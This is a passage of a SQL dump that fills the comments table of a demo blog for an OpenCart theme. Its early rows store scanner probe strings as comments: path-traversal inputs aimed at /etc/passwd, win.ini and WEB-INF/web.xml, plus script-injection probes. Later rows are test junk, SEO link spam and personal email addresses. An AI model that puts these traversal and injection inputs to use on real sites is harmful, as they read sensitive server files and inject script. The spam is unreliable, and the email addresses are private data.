././././././././././././././././././././././././././././././././.', 0, '2017-10-27 15:55:12'),
(458, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'file:///etc/passwd', 0, '2017-10-27 15:55:12'),
(459, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/\\../\\../\\../\\../\\../\\../\\../etc/passwd', 0, '2017-10-27 15:55:13'),
(460, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-27 15:55:14'),
(461, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/WEB-INF/web.xml', 0, '2017-10-27 15:55:14'),
(462, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-27 15:55:15'),
(463, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini', 0, '2017-10-27 15:55:15'),
(464, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts', 0, '2017-10-27 15:55:16'),
(465, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini\\0.jpg', 0, '2017-10-27 15:55:17'),
(466, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '................windowswin.ini', 0, '2017-10-27 15:55:19'),
(467, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini', 0, '2017-10-27 15:55:20'),
(468, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini', 0, '2017-10-27 15:55:21'),
(469, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini', 0, '2017-10-27 15:55:22'),
(470, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini', 0, '2017-10-27 15:55:22'),
(471, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\', 0, '2017-10-27 15:55:23'),
(472, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-27 15:55:24'),
(473, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-27 15:55:25'),
(474, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;GBGY(9359)&lt;/ScRiPt&gt;', 0, '2017-10-27 15:55:52'),
(475, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;GBGY(9542)&lt;/ScRiPt&gt;', 0, '2017-10-27 15:55:53'),
(476, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '19360944', 0, '2017-10-27 15:55:54'),
(477, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1acuWD4Hso7eRC', 0, '2017-10-27 22:41:35'),
(478, 1, 1, 0, 0, 'hanny', 'hanny@mail.com', 'hannyfb.com', 'good', 0, '2017-12-07 06:22:42'),
(479, 37, 4, 0, 0, 'Hdbdn', 'Hfhfhd@yahoo.com', 'Jxjf', 'Bdndjdhj', 0, '2017-12-10 17:16:46'),
(480, 38, 4, 0, 0, 'Chris', 'Chris@yahoo.com', 'Jfjd', 'Nfnfmmfmf', 0, '2017-12-10 17:16:59'),
(481, 0, 1, 0, 0, 'abuzittın', 'writersce@gmail.com', 'otoerdem.com', 'Very cool, I almost bought a new module just so i could get the blog on my website. I am now updating my Journal theme so i can get this. It looks very nice and smooth :) Thanks guys. I also added my mysite, just to test and see if the comments are nofollow links, which i want on my site. http://perfect-body.dk', 0, '2018-01-13 11:13:18'),
(482, 100, 1, 0, 1, 'Journal Theme', 'journal@digital-atelier.com', 'https://www.journal-theme.com/', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.', 1, '2018-03-13 12:58:18'),
(483, 0, 1, 0, 0, 'parcacimoto.com', 'parcacimyedekparca@gmail.com', 'parcacimoto.com', 'awesome theme and excellent support. journal theme on my site', 0, '2018-03-21 12:46:05'),
(484, 0, 3, 0, 3, 'demo demo', 'demo@demo.dm', 'test.com', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam iaculis egestas laoreet. Etiam faucibus massa sed risus lacinia in vulputate dolor imperdiet. Curabitur pharetra, purus a commodo dignissim, sapien nulla tempus nisi, et varius nulla urna at arcu.', 0, '2018-05-18 00:26:42'),
(485, 0, 1, 0, 3, 'demo demo', 'asdasdasd@asdasd.com', '', 'thanks', 0, '2018-05-24 11:27:46'),
(486, 0, 3, 0, 3, 'demo demo', 'test@test.com', '', 'test', 0, '2018-06-24 13:14:20'),
(487, 0, 1, 0, 0, 'Japanese', '100000@1000.com', '', 'rtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyrrtytryertyertyertyertyr', 1, '2019-03-16 06:33:35'),
(488, 0, 1, 0, 0, 'rter', 'werter@fgdfg.com', 'erterwt', 'ewtetwe', 1, '2019-04-11 12:09:14'),
(489, 488, 1, 0, 0, 'werwerqwer', 'werwqer@aaaaa.com', 'werwqer', 'werwqerwrwe', 1, '2019-04-11 12:09:46'),
(490, 0, 9, 275, 0, 'Mus\\\'ab Albadi', 'mualbadi@gmail.com', '', 'Ggggggg fgg', 1, '2019-04-29 01:39:58'),
(491, 490, 9, 275, 0, 'Mus\\\'ab Albadi', 'mualbadi@gmail.com', 'Hc', 'Ggfxddv', 1, '2019-04-29 01:40:12'),
(492, 0, 3, 0, 0, 'Katell Brennan', 'qulywylyla@mailinator.com', 'https://www.hyrehywo.com.au', 'Aut cumque id exerc', 1, '2019-05-24 00:32:30'),
(493, 492, 3, 0, 0, 'Francis Head', 'zytede@mailinator.net', 'https://www.qacyfa.org.uk', 'Quis blanditiis debi', 1, '2019-05-24 00:32:43'),
(494, 492, 3, 0, 0, 'Lucian Copeland', 'sazojujezu@mailinator.net', 'https://www.femebosefo.cc', 'Et qui laborum Ab r', 1, '2019-05-24 00:32:58'),
(495, 0, 3, 0, 0, 'Wesley Shelton', 'hihufewu@mailinator.net', 'https://www.haqosusukimin.cm', 'Rerum reiciendis cup', 1, '2019-05-24 00:33:00'),
(496, 0, 11, 0, 0, 'fg', 'fashionfresh@gmail.com', 'df', 'df', 1, '2019-06-04 10:07:37'),
(497, 496, 11, 0, 0, 'sd', 'dev.apcrat@gmail.com', 'd', 'd', 1, '2019-06-04 10:07:46'),
(498, 0, 9, 0, 2, 'demo demo', 'demo@demo.com', '', 'fsdfsdfsd', 1, '2019-06-07 20:56:45'),
(499, 0, 11, 199, 0, 'Devesh Samaiya', 'samaiya.devesh@gmail.com', '', 'Testing', 1, '2019-06-16 13:39:18'),
(500, 0, 12, 0, 0, 'Mazen', 'said.mazen@yandex.ru', '', 'олло', 1, '2019-07-29 09:45:14'),
(501, 0, 12, 0, 0, 'Mazen', 'said.mazen@yandex.ru', '', 'оттштшщтщтщ', 1, '2019-07-29 09:46:45'),
(502, 500, 12, 0, 0, 'Mazen', 'said.mazen@yandex.ru', '', 'отщдто', 1, '2019-07-29 09:47:46'),
(503, 0, 12, 0, 0, 'aaaa', 'a@f.com', '', 'boo', 1, '2019-08-20 16:00:11'),
(504, 0, 12, 0, 0, 'Tipo anglichanin', 'Dimalox@loxi.ru', '', 'Axaxaxaxax', 1, '2019-10-28 18:52:49'),
(505, 0, 10, 0, 0, 'nicola cristiani', 'crinik59@gmail.com', '', 'gdfh', 1, '2019-11-22 21:56:35'),
(506, 61, 8, 0, 0, 'Test1', 'test@test1.com', '', 'Test comment.', 1, '2019-11-26 11:25:16'),
(507, 0, 1, 0, 0, 'Floor', 'office@extrafloors.eu', 'https://extrafloors.eu/', 'Specific', 1, '2019-12-04 12:37:07'),
(508, 0, 1, 0, 0, 'doors', 'saitcheta@abv.bg', 'https://bgconstruction.eu', 'vrati', 1, '2019-12-06 23:42:22'),
(509, 0, 1, 0, 0, 'store', 'saitcheta@abv.bg', 'https://qualitystore.eu', 'qualitystore', 1, '2019-12-06 23:42:50'),
(510, 0, 1, 0, 0, 'pvc', 'saitcheta@abv.bg', 'https://pvclamperia.eu', 'lamperia', 1, '2019-12-06 23:43:18'),
(511, 0, 1, 0, 0, 'remonti', 'saitcheta@abv.bg', 'https://24bg.eu', 'stroitelstvo', 1, '2019-12-06 23:43:49'),
(512, 0, 1, 0, 0, 'pod', 'saitcheta@abv.bg', 'https://pervazi.eu', 'pervazi pvc', 1, '2019-12-06 23:44:27'),
(513, 0, 1, 0, 0, 'parket', 'saitcheta@abv.bg', 'https://trisloenparket.eu', 'trisloini parket', 1, '2019-12-06 23:45:14'),
(514, 0, 1, 0, 0, 'siding', 'saitcheta@abv.bg', 'https://oblicovki.eu', 'siding and pvc panele', 1, '2019-12-06 23:46:08'),
(515, 0, 1, 0, 0, 'doorssofia', 'saitcheta@abv.bg', 'https://doors-sofia.eu', 'vrati-vhodni i interiorni', 1, '2019-12-06 23:46:47'),
(516, 0, 1, 0, 0, 'Tiam', 'saitcheta@abv.bg', 'https://siding.eu', 'Aliquam nibh sem, placerat sit amet justo consectetur, ornare dignissim mauris. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Nam molestie lorem tortor, id gravida neque sollicitudin at. Curabitur in ligula sit amet sem vulputate malesuada sit amet et lectus. Mauris lobortis feugiat massa at venenatis. Nullam dictum elementum quam, quis lobortis nibh tincidunt non. Ut sapien magna, eleifend sed ornare ut, posuere vel libero. Aliquam et eros ut eros rhoncus eleifend. Duis at varius urna. Proin tempus semper porttitor. Sed mollis luctus erat ac pharetra.', 1, '2019-12-08 17:20:56'),
(517, 0, 1, 0, 0, 'deck', 'saitcheta@abv.bg', 'https://decking-bg.eu', 'Sed blandit eros metus, quis porttitor quam semper sit amet. Sed euismod, purus vel commodo congue, nunc neque faucibus metus, auctor dignissim ligula mauris id quam. Vestibulum sed venenatis nunc. Nunc fermentum mollis leo nec sodales. Mauris quis ante sit amet magna lobortis faucibus. Suspendisse lectus odio, vehicula nec nulla id, fermentum dictum lectus. Maecenas ut erat eu sem congue sodales.', 1, '2019-12-08 17:31:50'),
(518, 0, 1, 0, 0, 'Brigida', 'saitcheta@abv.bg', 'https://home-bg.eu', 'Nam molestie lorem tortor, id gravida neque sollicitudin at', 1, '2019-12-14 12:03:29'),
(519, 0, 1, 0, 0, 'lorel kiter', 'saitcheta@abv.bg', 'https://bglamperia.com', 'i like this', 1, '2019-12-14 12:50:52'),
(520, 0, 1, 0, 0, 'test@test.com', 'test@test.com', 'www.test.com', 'Hello World!', 1, '2019-12-16 22:24:17'),
(521, 500, 12, 0, 0, 'Ppppp', 'Kmsjsj@naja.com', '', 'Hhshehje', 1, '2019-12-25 13:12:04'),
(522, 0, 11, 0, 0, 'test', 'bilisimmagazin@gmail.com', 'test', 'test', 1, '2020-02-06 12:47:53'),
(523, 0, 11, 0, 0, 'Test', 'bilisimmagazin@gmail.com', 'http://www.eticaret.tv', 'E-ticaret haberleri tema tasarımları örnek web site yorum denemesi.\r\nE-ticaret teması için yapılmış basit örnek bir yorum.\r\n\r\nYorum test.\r\nOpencart temaları için yapılan test bir yorumdur.\r\n\r\nTest comment', 1, '2020-02-06 12:49:39'),
(524, 0, 12, 0, 0, 'Imran Khan', 'imrankhan@icloud.com', 'Www.Dodo.com', 'Oye hello', 1, '2020-02-10 19:15:47'),
(525, 0, 1, 0, 0, 'Test testov', 'Iii@www.www', '', 'Cool', 1, '2020-02-25 18:16:57'),
(526, 525, 1, 0, 0, 'Test', 'I@gggg.gg', '', 'Test 2', 1, '2020-02-25 18:17:32'),
(527, 0, 11, 0, 2, 'Orjinal Toner', 'info@sarfdepo.com', 'www.sarfdepo.com', 'Orjinal HP Marka Kartuşları en uygun fiyata satmaktadır. \\\r\\\n\\\r\\\nE-Ticaret sistemi için yaptıkları basit bir sistem örneğidir. \\\r\\\n\\\r\\\n\\\r\\\n\\\r\\\nYorum Test. Orjinal kartuşları www.sarfdepo.com adresinde alırsınız. Test edilebilir.', 1, '2020-03-30 03:40:05'),
(528, 0, 11, 0, 2, 'demo demo', 'demo@demo.com', 'https://ww.sarfdepo.com', 'Orjinal HP Marka Kartuşları en uygun fiyata satmaktadır. \\\r\\\n \\\r\\\n E-Ticaret sistemi için yaptıkları basit bir sistem örneğidir. \\\r\\\nYorum Test. Orjinal kartuşları https://www.sarfdepo.com adresinde alırsınız. Test edilebilir.', 1, '2020-03-30 03:41:00'),
(529, 0, 11, 0, 2, 'demo demo', 'demo@demo.com', 'https://www.sarfdepo.com', 'Orjinal HP Marka Kartuşları en uygun fiyata satmaktadır. \r\n\r\n\r\n E-Ticaret sistemi için yaptıkları basit bir sistem örneğidir. \r\n\r\n\r\nYorum Test. Orjinal kartuşları https://www.sarfdepo.com adresinde alırsınız. \r\n\r\n\r\nTest edilebilir.', 1, '2020-03-30 03:42:10'),
(530, 0, 11, 0, 2, 'sarfdepo', 'demo@sarfdepo.com', '&lt;a href=&quot;www.sarfdepo.com&quot; title=&quot;Hp Orjinal Toner&quot;&gt;Orjinal Hp Kartuş&lt;/a&gt;', '&lt;a href=&quot;www.sarfdepo.com&quot; title=&quot;Hp Orjinal Toner&quot;&gt;Orjinal Hp Kartuş&lt;/a&gt;', 1, '2020-03-30 03:43:36'),
(531, 530, 11, 0, 2, 'demo demo', 'demo@demo.com', 'https://www.sarfdepo.com/', '&lt;a href=&quot;https://www.sarfdepo.com&quot; title=&quot;Hp Orjinal Toner&quot;&gt;Orjinal Hp Kartuş&lt;/a&gt;', 1, '2020-03-30 03:44:28');
INSERT INTO `journal3_blog_comments` (`comment_id`, `parent_id`, `post_id`, `customer_id`, `author_id`, `name`, `email`, `website`, `comment`, `status`, `date`) VALUES
(532, 0, 11, 0, 2, 'demo demo', 'demo@demo.com', '&lt;p&gt;&lt;/p&gt;&lt;a href=&quot;https://www.sarfdepo.com&quot; target=&quot;_blank&quot;&gt;KARTUŞ Orjinal Al&lt;/a&gt;', '&lt;p&gt;&lt;/p&gt;&lt;a href=&quot;https://www.sarfdepo.com&quot; target=&quot;_blank&quot;&gt;KARTUŞ Orjinal Al&lt;/a&gt;', 1, '2020-03-30 03:45:04'),
(533, 0, 12, 0, 2, 'demo demo', 'demo@demo.com', 'test.com', 'test.comtest.comtest.comtest.comtest.comtest.comtest.comv', 1, '2020-04-16 20:57:59'),
(534, 0, 12, 0, 2, 'Jason Jung', 'jasonjung@jason.com', 'jason.com', 'test comments test comments test comments test comments test comments test comments', 1, '2020-04-16 20:59:08'),
(535, 0, 12, 0, 0, 'Dijital pazarlama', 'a@gmail.com', 'https://www.dijitalpazarlamakocu.com/', 'Beautiful theme', 1, '2020-04-25 23:47:40'),
(536, 535, 12, 0, 0, 'dijital pazarlama', 'b@gmail.com', 'https://www.dijitalpazarlamakocu.com/', 'İts true:)', 1, '2020-04-25 23:50:24'),
(537, 0, 11, 0, 2, 'Dijital Pazarlama', 'b@gmail.com', 'https://www.dijitalpazarlamakocu.com/', 'Dijital pazarlamada çözüm ortağınız..', 1, '2020-05-15 00:39:55'),
(538, 0, 8, 0, 2, 'Dijital Butik', 'b@gmail.com', 'https://www.dijitalbutik.com/', 'Design and Ad\'s', 1, '2020-05-15 00:41:27'),
(539, 0, 4, 0, 2, 'Dijital Butik', 'b@gmail.com', 'https://www.dijitalbutik.com/', 'Design and Ad\'s', 1, '2020-05-15 00:42:22'),
(540, 0, 12, 0, 0, 'N11 Opencart Api Entegrasyonu', 'infooox@ticaretpanelim.com', 'https://www.ticaretpanelim.com', '&lt;a href=&quot;https://www.blog.ticaretpanelim.com/&quot; title=&quot;TicaretPanelim Opencart Entegrasyonu&quot; rel=&quot;dofollow&quot; target=&quot;_blank&quot;&gt;OpenCart Entegrasyonu&lt;/a&gt; ile sitenizde yer alan siparişlere, ürünlerinize ve müşterilerinizi tek ekranda takip edin.  &lt;a href=&quot;https://www.ticaretpanelim.com/&quot; title=&quot;TicaretPanelim Opencart API Entegrasyonu&quot; rel=&quot;dofollow&quot; target=&quot;_blank&quot;&gt;Opencart API Entegrasyonu&lt;/a&gt; sayesinde müşterilerinizi her zaman datanızda tutun. Opencart api entegrasyonu ile pazaryerlerinizi ön plana taşıyın. \r\nÜstelik JOURNAL 1 Temasına uygun şekilde tasarlanmıştır.', 1, '2020-05-16 05:56:13'),
